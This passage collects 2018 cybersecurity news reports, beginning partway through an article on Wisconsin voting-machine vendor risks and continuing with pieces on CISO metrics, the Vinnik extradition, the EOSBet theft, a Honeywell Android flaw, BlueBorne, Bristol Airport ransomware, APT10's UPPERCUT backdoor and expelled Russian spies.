He said governments need to make sure the vendors they work with "are using proper security and safeguarding their own software, data and systems that they're deploying out to the state level.

The Green Party's presidential candidate, Jill Stein, who won the right under state recount law to evaluate the source code for Wisconsin's voting machines, is advocating for public ownership of voting systems and technologies related to them.

"It's outrageous that our election systems are owned by private corporations that claim a proprietary interest in keeping critical information secret from the public," Stein campaign spokesman Dave Schwab wrote in an email to the Center.

Computer scientist J. Alex Halderman, who was part of the team that pushed for the 2016 recount of the presidential vote in Wisconsin, told the U.S. Senate Intelligence Committee that private vendors can make elections systems vulnerable.

"Attackers could target one or a few of these companies and spread malicious code to election equipment that serves millions of voters," Halderman, director of the University of Michigan's Center for Computer Security and Society, testified in 2017.

Wisconsin election integrity activists have sought transparency from Command Central LLC, a Minnesota-based vendor that has provided voting machine programming to more than half of Wisconsin's 72 counties. In a 2011 email interview with local activists, a company representative said it serviced "3,000 pieces of equipment" in 46 Wisconsin counties.

The Center asked Command Central several questions, including the number of governments it currently serves in Wisconsin, what technology it uses to exchange files with clerks and whether there are any full-time security personnel in the company.

"We do not disclose information to the press (or the public) about internal and external procedures with our customers or the specifics of our internal security settings/applications," Command Central President Chad Trice wrote in response.

Two corporations that supply most of the voting machines in Wisconsin, Election Systems & Software of Omaha, Nebraska; and Dominion Voting Systems of Denver, are suing the state Elections Commission and the Stein campaign in Dane County Circuit Court in Madison over the campaign's plans to evaluate voting software used in the 2016 presidential election. The companies argue that any public dissemination of the findings would jeopardize "highly confidential, proprietary and trade secret information."

Another potential vulnerability is the use of removable devices to transfer programming to the voting machines. If such a device contains malicious software, it can infect even voting machines not connected to the internet, said Alexis Dorais-Joncas of the cybersecurity firm ESET, who investigated just such an attack by Russian intelligence-associated hackers in 2014.

According to the commission, any problems with the voting machines would be identified by required pre-election testing.

But Dmitry Volkov, chief technology officer for the company Group-IB based in Moscow, said such malicious software can be designed to be delivered "after all tests are conducted."

"(If) a vendor has access (to an election system) through a secure channel, if you hack the vendor, you can gain an access through this secure channel," said Volkov, a member of the advisory council on cybersecurity for Interpol, the European Union's law enforcement agency.

Harri Hursti, an international expert on election cybersecurity and co-founder of the Voting Machine Hacking Village at the annual DEFCON hacker conference, agreed. He said that "it is hard to make the claim that anything using any kind of USB devices can be air-gapped," or physically isolated from attack.

"USB memory cards are mini-computers," Hursti said, "and we have known for years how to reprogram those to carry malicious content over air gaps and extract confidential information."

Experts said another potential vulnerability is associated with the use of modems in voting machines across Wisconsin to transmit unofficial Election Day results.

In some cases, those modems are transmitting results over the internet, Haas, the former Elections Commission administrator, acknowledged in 2016 testimony during the legal battle over Wisconsin's presidential recount.

But Magney said the devices "do not accept any incoming connections. The user keys in a specific phone number to dial out. While misdials or interceptions may be possible . the receiving computer also has a firewall, and accepts authenticated transmissions for a very short period of time."

Vendors and elections commission officials say proper safeguards, such as malware detection and encryption, are in place. Magney said the transmissions are made "only after all the votes have been tabulated." He noted that the new National Academy of Sciences report does not mention modems as a potential vulnerability.

However, computer scientists say that existing defense measures can be overrun. According to The New Yorker, such concerns have prompted four states — New York, Maryland, Virginia and Alabama — to prohibit the use of machines with modems to transmit election results.

Another practice criticized by the computer scientists is the use of cellular technology to transmit unofficial election results. Cellular networks' security liabilities were detailed in a 2017 U.S. Department of Homeland Security report, which called for enhanced protections when governments use cellular technology.

At the Center's request, the list of cellular modems in use in Wisconsin election systems was reviewed by Bart Stidham, chief executive officer of NAND Technologies, who has conducted cellular network security analysis for DHS and commercial clients.

In 2017, DHS designated election systems as critical infrastructure in need of enhanced protection. Stidham said most of the cellular modems used by Wisconsin "are commodity consumer devices. They are not designed for use in critical infrastructure."

Magney said the federal government "is still parsing out what that (critical infrastructure) designation means" when it comes to elections and voting equipment.

Another vulnerability, according to Volkov, is that some of these cellular wireless modems rely on public cellular networks.

"If you are on a public network," he said, "you can be reached."

In February, two Princeton University computer science professors, Andrew Appel and Kyle Jamieson, published a blog describing possible scenarios to hack modems used in DS200 paper ballot tabulators, including erecting fake cellphone towers near voting locations like police do with Stingray devices.

"If your state laws, or a court with jurisdiction, say not to connect your voting machines to the internet, then you probably shouldn't use telephone modems either," they said.

Magney downplayed the concerns, noting that only unofficial encrypted results from Election Day are transmitted this way after polls close. Those are backed up by a printed paper tape, which is used to verify the official results.

But even discrepancies between initially reported unofficial results and the outcome of the election may achieve Russia's goal of sowing discord, according to FireEye's McNamara.

He is among those cautioning against becoming too focused on the vulnerabilities of America's vote-tallying systems. McNamara said the Kremlin's goal may be simpler: "Attacking the confidence of electoral process itself."

*The nonprofit news outlet Wisconsin Center for Investigative Journalism provided this article to The Associated Press through a collaboration with Institute for Nonprofit News.


CISOs and the Quest for Cybersecurity Metrics Fit for Business
18.9.2018 securityweek
Cyber

Never-ending breaches, ever-increasing regulations, and the potential effect of brand damage on profits has made cybersecurity a mainstream board-level issue. It has never been more important for cybersecurity controls and processes to be in line with business priorities.

A recent survey by security firm Varonis highlights that business and security are not fully aligned; and while security teams feel they are being heard, business leaders admit they aren't listening.

The problem is well-known: security and business speak different languages. Since security is the poor relation of the two, the onus is absolutely on security to drive the conversation in business terms. When both sides are speaking the same language, aligning security controls with business priorities will be much easier.

Well-presented metrics are the common factor understood by both sides and could be used as the primary driver in this alignment. The reality, however, is this isn’t always happening

Using metrics to align Security and Business

SecurityWeek spoke to several past and present CISOs to better understand the use of metrics to communicate with business leaders: why metrics are necessary; how they can be improved; what are the problems; and what is the prize?

Demolishing the Tower of Babel

“While some Board members may be aware of what firewalls are,” comments John Masserini: CISO at Millicom Telecommunications, “the vast majority have no understanding what IDS/IPS, SIEMs, Proxies, or any other solution you have actually do. They only care about the level of risk in the company.”

CISOs, on the other hand, understand risk but do not necessarily understand which parts of the business are at most risk at any time. Similarly, business leaders do not understand how changing cybersecurity threats impact specific business risks.

The initial onus is on the security lead to better understand the business side of the organization to be able to deliver meaningful risk management metrics that business leaders understand. This can be used to start the process for each side to learn more about the other. Business will begin to see how security reduces risk, and will begin to specify other areas that need more specific protection.

The key and most common difficulty is in finding and presenting the initial metrics to get the ball rolling. This is where the different ‘languages’ get in the way. “The IT department led by the CIO typically must maintain uptime for critical systems and support transformation initiatives that improve the technology used by the business to complete its mission,” explains Keyaan Williams, CEO at CLASS-LLC. “The Security department led by the CISO typically must maintain confidentiality, integrity, and availability of data and information stored, processed, or transmitted by the organization. These departments and these leaders tend to provide metrics that focus on their tactical duties rather than business drivers that concern the board/C-suite.”

Drew Koenig, consultant and host of the Security in Five podcast, sees the same basic problem. “In security there tends to be a focus on the technical metrics. Logins, blocked traffic, transaction counts, etc... but most do not map back to business objectives or are explained in a format business leaders can understand or care about. Good metrics need to be tied to dollars, business efficiency shown through time improvements, and able to show trending patterns of security effectiveness as it relates to the business. That's the real challenge.”

Williams sees the problem emanating from a lack of basic business training in the academic curriculum that supports IT and security degrees. “The top management tool in 2017 was strategic planning,” he said. “Strategic planning is often listed as one of the top-five tools of business leaders. How many security leaders understand strategic planning and execution enough to ensure their metrics contribute to the strategic initiatives of the organization?”

It is not up to the business leaders to learn about security. “The downfall for many CISOs in the past is believing that business needs to understand security,” adds Candy Alexander, a virtual CISO and president-elect of ISSA. “That is a mistake, because security is our job. We need to better understand the business, so that we can articulate the impact of not applying appropriate safeguards. The key to this whole approach is for the CISO to understand the business, and to understand the mission and goals of the business.”

Is it worth the effort?

With no exception, the CISOs SecurityWeek spoke to believe that better presentation of the right security metrics will help align security and business. In fact, comments Alexander, “It is the only way CISOs can get executive management to understand what the challenges are and what the successes have been.”

That doesn’t make it any easier. Apart from metrics and the security /business dynamic, CISOs must also understand the psychology of the boardroom – and that will vary from company to company. “Some boards care greatly about security, and others have little interest,” comments Daniel Miessler, director of client advisory services at IOActive. “If, for example, the business is being crushed by a competitor, having nothing to do with security, then it could be (but not always) that security is justifiably a lower priority to the board.”

Timing thus becomes an issue over which the CISO may have little control. Should metrics presentations be regular or given only when necessary. The former may unnecessarily take up the business leaders’ time, while the latter will paint the CISO as the bringer of doom.

Tomas Honzak, CISO at GoodData, feels that reporting should be rare. “The board should not be hearing about security on a regular basis,” he told SecurityWeek. “Unless there is a critical issue or significant business transformation, an annual presentation of the key trends, evolution of the threat landscape and strategic security plans are all that the board should be receiving from security.”

This is a minority view. Many CISOs at least imply that metrics reporting should be delivered sufficiently frequently to be able to show trends.

And then there’s style. Having got the opportunity to present to business leaders, it is very important that it is not wasted. “Many reports are like some presenters – single toned and boring,” comments Steven Lentz, head of security at Mojio and former CSO at Samsung Research America. “The report is either too long (too much detail) or too much fluff. If the report is not good it will simply cause more questions to be asked.”

The solution, he suggests, is that CISOs need be a sales and marketers as well as a security experts. The presentation itself must be like a good CV, able to capture attention within the first few sentences and maintain interest through the duration. Critically, he adds, “The report will answer questions rather than having the board question the report.”

This is key and strikes at the very core of metrics reporting. If the purpose is to say, ‘look how good your security team is’, or to highlight a new problem that needs more budget, then you should expect queries. But if the purpose is to align your security with business priorities then the metrics need to be more self-explanatory. They can be provocative, to provoke comment and discussion with and from the business leaders, but they should not elicit queries on the reporting itself.

Are CISOs delivering adequate metrics to the board?

Asked if CISOs are currently delivering good metrics, the answer was an unequivocal yes and no, maybe, it depends, but probably not.

Metrics reporting is a classic chicken and egg problem. To deliver good metrics, the CISO must understand what the business leaders want; but understanding this want comes through aligning security and business through delivering effective security metrics.

Ideally, the CISO should already be at the level of the C-Suite. “A critical enabler delivering business-centric metrics is that the security function is not simply reporting up into the C-suite but is instead being part of that level,” suggests Raef Meeuwisse, a CISO consultant and author of Cybersecurity for Beginners. “Only where security is engaged and involved in the highest levels of the business can any organization hope that their security approach, including what is measured and reported, will reflect a deep understanding of the business strategy, direction and needs.”

That, sadly, is rarely possible. “Unfortunately, the governance crisis continues,” explains Tom Kellermann. chief cybersecurity officer at Carbon Black, “as most CISOs still report to CIOs. Your defensive coordinator is reporting to your offensive coordinator.” What the CIO is often most interested in learning (how often security has prevented downtime) is not the same as what security should be reporting to business (such as how, why, and by how long dwell time has been reduced).

Poor metrics is more common than no metrics. “For example, I see many security programs that report on the number of threats blocked by security tools because the logs are easy to parse. It is a bonus that the volume of blocked threats sounds impressive. Unfortunately, this data rarely informs the business decisions that concern the board/C-suite.”

Do vendors help with producing metrics from their applications?

It would help if vendors produced readymade presentable metrics as part of their application reporting capabilities. Some are trying. “With a resurgence of interest in quantifying one’s security posture, vendors are looking more to provide this across different parts of the hybrid infrastructure,” explains Anupam Sahai, VP of product management at Cavirin. “This is also a major initiative by service providers and MSSPs. The Verizon Risk Report is a good example.”

Not all vendors agree. “This is not a vendor issue,” said Chris Morales, head of security analytics at Vectra.

Cybersecurity Metrics“The issue is whether or not there is solid alignment between the metrics that security wishes or needs to use and the information that the board requires,” explains Steve Durbin, MD of the Information Security Forum. His concern is that applications usually generate a high volume of detailed statistics that require significant processing (normalization, aggregation and analysis) before they can be interpreted and presented to the board.

The metrics presented to the board, he continued, “should convey details relating to targets of particular interest to each audience, and be clear, concise and limited in number (often four or five).”

Chris Key, CEO and co-founder of Verodin, goes further. “Relying on a vendor to provide meaningful metrics on the effectiveness of the control they sold you is like having the fox watch the hen house. Additionally, no single vendor's control represents the effectiveness of an organization’s full cybersecurity strategy.”

Less bluntly, Meeuwisse explains, “Vendors have a tough time because they are usually being squeezed on price, often asked for their security metrics in a different format for each customer and can be trying to achieve security on a smaller budget than many of their customers. As someone who has audited tens of different suppliers in my time, I almost always find substantial gaps. Most vendors show an increasing willingness to provide security metrics, but my own experience is those metrics, when available, are usually carefully crafted to avoid displaying any real issues.”

“Some vendors require log aggregation to a separate reporting server running its own analytics software, which can be an expensive and complex solution,” comments Heather Paunet, VP of product management at Untangle. “Additionally, some vendors only offer very high-level, canned reports that don't enable administrators to drill down on specific issues, limiting their usefulness.”

For board-level metrics, analytics data must often be combined with some sort of cost-benefit analysis, something that few vendors provide out-of-the-box. “It's important,” she suggests, “that security teams select vendors who provide database-driven reporting that can be easily customized to fit their needs.”

The consensus is that vendors can and should provide raw data on their product performance, but the CISO will always need to collect, correlate, analyze and present the right metrics in the right form in a manner that directly relates to the interests and concerns of business leadership.

What makes a good metric?

This all begs the question: what makes good metrics that are relevant to business leaders and can be used to further the alignment of security and business?

“Transforming security metrics into business information requires a change in focus and reporting format,” claims Williams. “Businesses measure progress and performance using scorecards, monthly or quarterly business reviews, and KPIs. Any security metrics provided to the business need to contribute to the performance measures that the business is already conducting. Providing security information that answers business questions is far superior to providing technical information and log details that have no relationship to business goals and objectives.”

“I like the old cliché that metrics need to be SMART – Specific, Measurable, Accurate, Reliable and Timely,” suggests Martin Zinaich, information security officer at the City of Tampa, Florida. “If done properly metrics can help align the Security Office to the Business and vice versa.”

He likes to keep things simple but informative. “Using standard Red/Yellow/Green indicators can quickly show the board alignment to risk, compliance and governance. Graphs can be leveraged to show risk reduction over time and overall framework alignment. Quad charts can quickly show top risks, issues requiring management attention, any major incidents and relevant projects in-flight. The goal is to be informative but brief, not technical, but statistical and aligned for a business/infosec synergic relationship.”

Sahai agrees that simple is best. “Consider the FICO score,” he says. “So, a single metric, say on a scale of 0 (worst) to 100 (best), that reflects a combination of the organization’s security and compliance posture.” The devil, of course, is in the detail. “If you look at how hackers infiltrate and compromise an organization, a score may be developed using the same approach. You first discover and classify resources, both on-prem and in the cloud, and assess threats against them, both internal and external. Based on this assessment, you identify any weaknesses and then evaluate the resources against any controls in place.”

The result, he continued, “is an overall score that reflects the organization’s current cyber posture. Correcting identified weaknesses will raise the score. Additional elements that go into scoring may include the likelihood of the breach and the projected impact. This latter point can map to the CIA model – confidentiality, integrity, and availability.”

Trends are important. “Can you provide month-over-month statistics of how each business unit has reduced the inherent risk across the company because the average time to patch has decreased significantly?” asks Masserini. “Those are the types of metrics the Board cares about, not how many attacks the firewall blocked, or how many patches are missing across the entire infrastructure, or any other ‘frighten them with huge numbers’ type metrics.”

Those huge numbers may be relevant to infosec at the operational level, says Bonney. But, he adds, “At the board level, it’s fundamentally speaking the board’s language – the board has a fiduciary duty to protect the business and keep it a going and growing concern. Align the metrics you report to the board with these goals. Deliver the metrics in terms they understand – impact on the business not impact on or of the technology – and make sure they know what the ask is. Never leave a board meeting without making the ask.”

Lentz also agrees that reporting must be continuous, with trends rather than static points in time. “I believe you also need to do a trend report,” he said. “In other words, over time – say month to month – showing a year. This way the board can clearly see wins, improvements, and areas of concern that need addressing. A clear visual presentation and roadmap so the board can grasp rather than look confused.”

Morales goes deeper and offers specific metrics to include: dwell time, lateral movement, reinfection, network coverage and response time.

Miessler and Kellermann show how these issues can be combined and worked into business-centric metrics.

“Two that we really like to include,” said Miessler, “are firstly, the amount of risk visibility present in the organization (percentage of systems under security management). That is, don’t just report on what you can see, but what percentage of risk isn’t yet visible to you because of technological and time limitations. Secondly, the percentage of systems under management that have x, y, and z level of defenses implemented. These are quite different, as you can have great numbers for the latter while having bad numbers for the former, and risk will still be very high.”

Kellermann proposes “three grades of measurement which are encompassed in the level of risk posed to the information supply chain and operations for a company. These begin with the results from hunt teams to discern if there is a current compromise and what is the scale? Second how quickly can that cybercrime be suppressed and contained? Lastly, are we compliant with the security standards mandated in our industry and our geography. If not, why?”

Like Sahai, Paunet believes the different metrics should be brought together to show the overall security posture of the organization. “It's also helpful to show how the threat landscape and an organization's response is changing over time. This gives the executive team, who may not be cybersecurity experts, some insight into why security is business-critical and worthy of continued investment. CISOs need to distill security insights into something that can be consumed by a non-technical audience that is more interested in the ‘why’ than the ‘what’.”

Meeuwisse warns against being totally insular. “What technology and threat changes are being anticipated or experienced elsewhere in your industry? A dashboard about emerging threats is a great way to check if everything appears to be in hand and if anything needs to be added for consideration.”

But in the final analysis, as Chris Key succinctly says, “The best metrics demonstrate how effective the cybersecurity program is at achieving key business objectives.”

The key takeaways

What is clear from these discussions is that there is no simple answer to what makes good infosec metrics for reporting to business leadership. The detail will vary from industry sector to industry sector, and even company to company, depending on the key business drivers.

It is equally clear infosec must understand business. CISOs cannot expect business leaders to understand security. The purpose of the metrics is to explain how security supports, or could further support, business priorities. To do this, CISOs must understand those business priorities.

The problem here is that such understanding comes best from being a part of the overall business leadership – which rarely happens. In a few enlightened cases, CISOs have at least a voice at the board; but in most cases they still report to the CIO who will have his or her own priorities sometimes at odds with the CISO’s priorities.

Cracking the metrics nut is important. The prize is high – nothing less than more efficient security, a more profitable business, a greater likelihood of gaining budget when it is required, and greater personal visibility at board level. When security is seen to provide protection at the right level and in the important places, it genuinely becomes the enabler of safe business and increased profits rather than a simple drain on corporate funds.

Without good metrics, security and business alignment is unlikely. And without that alignment, security will be patchy and business at risk.


Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia
18.9.2018 securityaffairs
Crime

Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia, Supreme Civil and Criminal Court of Greece overruled previous ones.
The Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia, the decision has surprised the media because the man was expected to be extradited in the US or France as previously announces.

The decision of the Supreme Civil and Criminal Court of Greece has overruled previous ones that were taken by other Greek courts.

Russia, France, and the United States, where Vinnik is charged with different hacking crimes.

Greek Police have arrested the Russian national Alexander Vinnik (38) and they accuse the man of running the BTC-e Bitcoin exchange to launder more than US$4bn worth of the cryptocurrency.

The police seized two laptops, two tablets, mobile phones, a router, a camera, and four credit cards.

The authorities reported that since 2011, 7 million Bitcoin went into the BTC-e exchange and 5.5 million withdrawn.

According to the Greek media outlet the Daily Thess, the FBI tracked Alexander Vinnik for more than a year.

The man is charged by the US authorities with fraud and money laundering for more than $4 billion worth amount of Bitcoin (BTC) resulting from criminal activities, the US prosecutors requested his extradition in July 2017.

The Greek Supreme Court first opted out to extradite Vinnink to the US to face with the charges with the operation of an unlicensed money service business, money laundering, conspiracy to commit money laundering, and engaging in unlawful monetary transactions.

Vinnik is also accused to be the responsible for the failure of the Japanese bitcoin exchange Mt. Gox.
Mt. Gox was the biggest Bitcoin exchange at the time of the shut down in 2014 that occurred after the platform was the victim of a series of cyber heists for a total of $375 million in Bitcoin.

The U.S. authorities speculate the Russian man stole funds from Mt. Gox, with the help of an insider. The stolen funds were transferred to a wallet managed by Vinnik and funds were laundered through his platform BTC-e-service during a three-year period.

In July 2018 there was a twist, a Greek lower court agreed to extradite Vinnik to France to face with charges with hacking, money laundering, extortion and involvement in organized crime.

The Russian Foreign Ministry criticized the ruling and said the country will look to a response.

“Several days after taking an unfriendly decision to expel Russian diplomats and to deny entry to several Russian citizens, they have adopted a decision to extradite Russian citizen Alexander Vinnik to France,” Russia’s Foreign Ministry wrote in a statement. “It is obvious that Russia cannot leave these actions unanswered.”

AlexanderVinnik

The Russian government officially asked the Greek government to extradite Vinnik to Russia, where he is facing around $10,000 worth of fraud charges, practically nothing compared the charges in the US and France.

Now, the decision of the Greek Supreme Court is disconcerting, Vinnik is going to be extradited to Russia.

The Supreme Court will analyze France’s request for extradition on September 19, but its decision could be overrun by the Greek Minister of Justice.


EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS
18.9.2018 securityaffairs Hacking

The gambling application EOSBet was affected by a vulnerability in its smart contract system that has been exploited by attackers to steal $200,000 worth of EOS.
The security breach was first reported by the member “thbourlove” of the EOSBet Reddit community that shared the code used to exploit the flaw.

After seeing the exploit code, the EOSBet’s official Reddit account admitted the hack.

“Yep, we were hacked. But we also have this exact assertion that you do. I would be careful, it’s a bit deeper than you think.” stated the EOSBet’s official Reddit account

EOSbet app

“A million-dollar EOS gambling dApp suffered a major blow, just days after declaring itself to be the safest of its kind.” reported The Next Web website.

“Hackers have taken 40,000 EOS ($200,000) from the operating wallet of EOSBet by exploiting vulnerabilities in its smart contracts”

The gambling application is based on the EOS blockchain, it was taken offline in response to the security breach.

“[…] A few hours ago, we were attacked, and about 40,000 EOS was taken from our bankroll,” said an EOSBet spokesperson.

“This bug was not minor as was stated previously, and we are still doing forensics and piecing together what happened.”

According to the company the attackers exploited a bug in one of their games, but it seems that the same issue could affect other games of the gambling platform.

The hackers were able to forge fake hash to hijack the EOSBet’s transfer funds.

The attackers have attempted to transfer funds to a wallet under their control that looks very similar to the one used by EOSBet.

The hackers only make a limited number of transactions from a number of accounts, they used the following message or similar as a description:

“Memo: Please refund the illegal income eos, otherwise we will hire a team of lawyers in China to pursue all criminal liability and losses to you. Eosbet official eos account: eosbetdicell.”

Then crooks distributed the gains splitting them across many wallets that received small amounts of EOS tokens with the following message:

“Memo: Dear players: In order to make up for the loss of eosbet players in the hacking incident, the platform launched a recharge to send BET. 1EOS=1BET, the official eos account: eosbetdicell, the transfer will automatically give the same BET.”

It is still unclear if this incident is connected to a suspect gambler win realized the last week, the player claimed over $600,000 from EOSBet by doubling their money repeatedly in 36 hours.

Platform managers excluded any link between the hack and what is considered a legitimate win.


Google Android team found high severity flaw in Honeywell Android-based handheld computers
18.9.2018 securityaffairs
Android

Experts at the Google Android team have discovered high severity privilege escalation vulnerability in some of Honeywell Android-based handheld computers.
Security experts from the Google Android team have discovered a high severity privilege escalation vulnerability in some of Honeywell Android-based handheld computers that could be exploited by an attacker to gain elevated privileges.

According to the vendor, Honeywell handheld computers combine the advantages of consumer PDAs and high-end industrial mobile computers into a single rugged package.

The rugged devices provide enhanced connectivity, including industry standard 802.11x, Cisco compatibility, and Bluetooth, they are widely adopted in many sectors, including energy, healthcare, critical manufacturing, and commercial facilities.

The US ICS-CERT published a security advisory to warn of the vulnerability that affects several models of Honeywell Android handheld computers, including CT60, CN80, CT40, CK75, CN75, CT50, D75e, CN51, and EDA series.

The affected devices run various Android version between 4.4 and 8.1.

“A vulnerability in a system service on CT60, CN80, CT40, CK75, CN75, CT50, D75e, CN51, and EDA series mobile computers running the Android Operating System (OS) could allow a malicious third-party application to gain elevated privileges.” reads the advisory published by the US ICS-CERT.

The flaw, tracked as CVE-2018-14825, received a CVSS v3 base score of 7.6).

Customers should whitelist trusted applications to avoid malicious apps accessing the devices with high privileges.

An attacker could exploit the flaw to gain elevated privileges and unauthorized access e to sensitive information such as passwords and confidential documents.

“A skilled attacker with advanced knowledge of the target system could exploit this vulnerability by creating an application that would successfully bind to the service and gain elevated system privileges.” continues the advisory.

“This could enable the attacker to obtain access to keystrokes, passwords, personal identifiable information, photos, emails, or business-critical documents.”


One year later BlueBorne disclosure, over 2 Billion devices are still vulnerable
17.9.2018 securityaffairs
Vulnerebility

One year after the discovery of the BlueBorne Bluetooth vulnerabilities more than 2 billion devices are still vulnerable to attacks.
In September 2017, experts with Armis Labs devised a new attack technique, dubbed BlueBorne, aimed at mobile, desktop and IoT devices that use Bluetooth. The BlueBorne attack exposes devices to a new remote attack, even without any user interaction and pairing, the unique condition for BlueBorne attacks is that targeted systems must have Bluetooth enabled.

The attack technique leverages on a total of nine vulnerabilities in the Bluetooth design that expose devices to cyber attacks.

A hacker in range of the targeted device can trigger one of the Bluetooth implementation issues for malicious purposes, including remote code execution and man-in-the-middle (MitM) attacks. The attacker only needs to determine the operating system running on the targeted device in order to use the correct exploit.

According to the experts, in order to launch a BlueBorne attack, it is not necessary to trick the victim into clicking on a link or opening a malicious file.

The attack is stealthy and victims will not notice any suspicious activity on their device.

blueborne

Two months later, experts at Armis also revealed that millions of AI-based voice-activated personal assistants, including Google Home and Amazon Echo, were affected by the Blueborne flaws.

At the time of BlueBorne disclosure, Armis estimated that the security flaw initially affected roughly 5.3 billion Bluetooth-enabled devices.

One year after the company published a new report that warns that roughly one-third of the 5.3 billion impacted devices are still vulnerable to cyber attacks.

“Today, about two-thirds of previously affected devices have received updates that protect them from becoming victims of a BlueBorne attack, but what about the rest? Most of these devices are nearly one billion active Android and iOS devices that are end-of-life or end-of-support and won’t receive critical updates that patch and protect them from a BlueBorne attack.” states the new report published by Armis.

“The other 768 million devices are still running unpatched or unpatchable versions of Linux on a variety of devices from servers and smartwatches to medical devices and industrial equipment.

768 million devices running Linux
734 million devices running Android 5.1 (Lollipop) and earlier
261 million devices running Android 6 (Marshmallow) and earlier
200 million devices running affected versions of Windows
50 million devices running iOS version 9.3.5 and earlier”
It is disconcerting, one billion devices are still running a version of Android that no longer receives security updates, including Android 5.1 Lollipop and earlier (734 million), and Android 6 Marshmallow and earlier (261 million).

It is interesting to note that 768 million Linux devices are running an unpatched or unpatchable version, they include servers, industrial equipment, and IoT systems in many industries.

“An inherent lack of visibility hampers most enterprise security tools today, making it impossible for organizations to know if affected devices connect to their networks,” continues the report published by Armis.

“Whether they’re brought in by employees and contractors, or by guests using enterprise networks for temporary connectivity, these devices can expose enterprises to significant risks.”

Armis notified its findings to vendors five months ago, but the situation is not changed.

“As vulnerabilities and threats are discovered, it can take weeks, months, or more to patch them. Between the time Armis notified affected vendors about BlueBorne and its public disclosure, five months had elapsed. During that time, Armis worked with these vendors to develop fixes that could then be made available to partners or end-users.” added Armis.

Unmanaged and IoT devices grow exponentially in the enterprise dramatically enlarging the attack surface and attracting the interest of hackers focused in the exploitation of Bluetooth as an attack vector.


Cyber attack took offline flight display screens at the Bristol Airport
17.9.2018 securityaffairs
Attack

The Bristol Airport was hit by a cyber attack that caused problems with operations, flight display screens were taken offline for two days.
The Bristol Airport was hit by a ransomware-based attack that caused problems to the flight display screens for two entire days.

The news reported by the BBC and was confirmed by an airport spokesman that explained that the information screens were taken offline early on Friday in response to a “ransomware” based attack.

“Bristol Airport has blamed a cyber attack for causing flight display screens to fail for two days.” state the article published by the BBC.

“They are now working again at “key locations” including in departures and arrivals, and work is continuing to get the whole site back online.”

The personnel started incident response and contingency measures, “manual processes” manual processes have made up for the interruption of the systems, spokesman refers of usage of whiteboards and marker pens.

According to the spokesman, the airport did not pay the ransom to the attackers.

“We believe there was an online attempt to target part of our administrative systems and that required us to take a number of applications offline as a precautionary measure, including the one that provides our data for flight information screens.” said airport spokesman James Gore.

“That was done to contain the problem and avoid any further impact on more critical systems.

Bristol airpost attack
Source BBC – Image copyright JULIEANNE MCMAHON Image caption A spokesman said whiteboards and marker pens had to be used in place of display screens.

The experts don’t believe it was a targeted attack against the British critical infrastructure.

“The indications are that this was a speculative attempt rather than targeted attack on Bristol Airport.”

The good news is that flights were not affected by the cyber attack

Mr Gore said flights were unaffected, but contingency measures and “manual processes”, including whiteboards and marker pens, had to be used in place of display screens.

“At no point were any safety or security systems impacted or put at risk.”

“Given the number of safety and security critical systems operating at an airport, we wanted to make sure that the issue with the flight information application that experienced the problem was absolutely resolved before it was put back online.”


China-linked APT10 group behind new attacks on the Japanese media sector
17.9.2018 securityaffairs
APT

Recently researchers from FireEye uncovered and blocked a campaign powered by the Chinese APT10 cyber espionage group aimed at Japanese media sector
In July, security researchers from FireEye uncovered and blocked a campaign carried out by Chinese APT10 group (aka Menupass, and Stone Panda) aimed at Japanese media sector.

Experts noticed the group since around mid-2016 when it was using PlugX, ChChes, Quasar and RedLeaves malware in targeted attacks.

The group has been active at least since 2009, in April 2017 experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide.

In July 2018, FireEye observed a series of new attacks of the group leveraging spear-phishing emails using weaponized Word documents that attempt to deliver the UPPERCUT backdoor, also tracked as ANEL.

The ANEL malware was already seen in the previous attack as a beta version or release candidate.

The spear phishing emails have an unreadable content and use titles related to maritime, diplomatic, and North Korean issues. The body of the messages includes a password to use to see the password-protected document.

The analysis of the UPPERCUT samples revealed that their timestamps were overwritten and filled with zeroes. The experts pointed out the lack of visibility into the UPPERCUT 5.2.x series, but they speculated that minor versions might have been released every few months between December 2017 and May 2018.

“The compile time of loaders in the newer version(s) are not shown here since the timestamps are overwritten and filled with zeroes. We don’t have visibility into UPPERCUT 5.2.x series, but it’s possible that minor revisions were released every few months between December 2017 and May 2018.” states the report.

“Unlike previous versions, the exported function names are randomized in the latest version”

APT10 timeline

The latest version also implements another new feature, it sends an error code in the Cookie header when failing to receive the HTTP response from the command and control (C&C) server.

The malicious code support several commands such as:

The commands supported in the new version include: download and validate file; upload file to the C&C; load PE file; download, validate, execute file, and send output to C&C server; format the current timestamp; capture the desktop screenshot in PNG format and send it to C&C; execute received buffer via cmd.exe and send the output to the server.

“While APT10 consistently targets the same geolocation and industry, the malware they use is actively evolving,” FireEye concludes.

“In the newer versions of UPPERCUT, there is a significant change in the way backdoor initializes the Blowfish encryption key, which makes it harder for analysts to detect and decrypt the backdoor’s network communications. This shows that APT10 is very capable of maintaining and updating their malware,”


Dutch expelled two Russian spies over hack plan on Swiss lab working on Skripal case
17.9.2018 securityaffairs
BigBrothers

Dutch intelligence services arrested two alleged Russian spies that were planning to hack a Swiss laboratory where is ongoing an investigation on the poisoning of the spy Sergei Skripal.
According to Dutch-based NRC newspaper and Swiss daily Tages-Anzeiger, Dutch intelligence services arrested two alleged Russian spies working for Russia’s GRU military intelligence service on suspicion of planning to hack the Spiez laboratory near Bern.

The laboratory conducts investigations for a global chemical arms watchdog, the Organisation for the Prohibition of Chemical Weapons (OPCW), its researchers were investigating the poisoning of agent Sergei Skripal and his daughter in Salisbury.

The two agents carried equipment to hack into the network of the laboratory to spy on the activity of its researchers.

Russian Foreign Minister Sergei Lavrov expressed his disappointment for the arrest of the two men earlier this year.

“The two were detained “early this year” by Dutch military intelligence (MIVD) working together with several other countries, and then expelled from the Netherlands, the newspapers reported.” states the AFP press.

The decision to expel the two spies was taken by the cabinet of the Dutch Prime Minister Mark Rutte on March 26.

“The duo, according to sources within the investigation, carried equipment which they wanted to use to break into the computer network” of the Spiez laboratory.

The researchers at the Spiez Lab were analyzing data related to poison gas attacks in Syria, as well as the attack on the double agent Sergei Skripal that involved the nerve agent Novichok on Russian double agent Sergei Skripal and his daughter.

“The case of the Russian spies discovered in The Hague and then expelled from The Hague is known to Swiss authorities,” Isabelle Graber, spokeswoman for the Swiss intelligence services (SRC), told AFP.

